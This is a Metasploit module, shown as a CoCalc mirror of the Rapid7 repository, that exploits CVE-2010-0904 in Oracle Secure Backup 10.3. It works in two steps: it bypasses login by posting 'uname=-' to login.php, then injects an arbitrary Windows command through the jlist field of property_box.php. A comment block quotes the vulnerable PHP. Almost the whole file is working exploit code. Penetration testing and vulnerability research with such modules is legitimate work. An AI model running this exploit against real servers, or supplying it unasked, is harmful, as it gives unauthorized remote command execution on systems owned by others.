Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',

14
        'Description' => %q{

15
          This module exploits an authentication bypass vulnerability

16
          in login.php in order to execute arbitrary code via a command injection

17
          vulnerability in property_box.php. This module was tested

18
          against Oracle Secure Backup version 10.3.0.1.0 (Win32).

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2010-0904' ],

24
          [ 'OSVDB', '66338'],

25
          [ 'ZDI', '10-118' ],

26
        ],

27
        'DisclosureDate' => '2010-07-13',

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [IOC_IN_LOGS],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        Opt::RPORT(443),

39
        OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),

40
        OptBool.new('SSL', [true, 'Use SSL', true]),

41
      ]

42
    )

43
  end

44


45
  def run

46
    cmd = datastore['CMD']

47


48
    res = send_request_cgi(

49
      {

50
        'uri'	=> '/login.php',

51
        'data'	=> 'attempt=1&uname=-',

52
        'method' => 'POST'

53
      }, 5

54
    )

55


56
    if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

57


58
      print_status("Sending command: #{datastore['CMD']}...")

59


60
      send_request_cgi(

61
        {

62
          'uri'	=> '/property_box.php',

63
          'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),

64
          'cookie' => res.get_cookies,

65
          'method' => 'POST'

66
        }, 5

67
      )

68


69
      print_status('Done.')

70
    else

71
      print_error('Invalid PHPSESSION token..')

72
      return

73
    end

74
  end

75
end

76
=begin

77
  else if (strcmp($type, "Job") == 0)

78
    {

79
    if (!is_array($objectname))

80
      $objectname = array();

81
    reset($objectname);

82
    while (list(,$oname) = each($objectname))

83
      {

84
      $oname = escapeshellarg($oname);

85
      $jlist = "$jlist $oname";

86
      }

87
    if (strlen($jlist) > 0)

88
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");

89
=end

90


91